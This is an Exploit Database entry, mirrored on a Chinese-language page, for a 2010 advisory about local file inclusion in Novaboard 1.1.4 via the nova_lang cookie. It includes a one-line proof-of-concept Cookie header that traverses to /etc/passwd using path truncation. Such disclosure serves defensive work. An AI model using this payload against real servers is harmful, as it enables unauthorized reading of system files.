Novaboard 1.1.4 – Local File Inclusion

Exploit Database
16 阅读

作者： High-Tech Bridge SA

日期： 2010-10-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15324/

Vulnerability ID: HTB22657
Reference: http://www.htbridge.ch/advisory/lfi_in_novaboard.html
Product: Novaboard 
Vendor: Novaboard( http://www.novaboard.net/ ) 
Vulnerable Version: 1.1.4 and probably prior versions 
Vendor Notification: 13 October 2010 
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in nova_lang variable from cookie.

The following PoC is available:


Cookie: nova_lang=../../../../../../../../../../../../../../etc/passwd/././././.[>4095 * "/."]/././././.

last Exploits
Novaboard 1.1.4 – Local File Inclusion的更多信息

Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution：
GeoVision (GeoHttpServer) Webcams – Remote File Disclosure：
Joomla! Component ACYMAILING 3.9.0 – Unauthenticated Arbitrary File Upload：
QuickTime Streaming Server – ‘parse_xml.cgi’ Remote Execution (Metasploit)：
Observium 0.16.7533 – (Authenticated) Arbitrary Command Execution：
Multi Restaurant Table Reservation System 1.0 – ‘table_id’ Unauthenticated SQL Injection：
smbind 0.4.7 – SQL Injection：
ChurchCRM 4.2.0 – CSV/Formula Injection：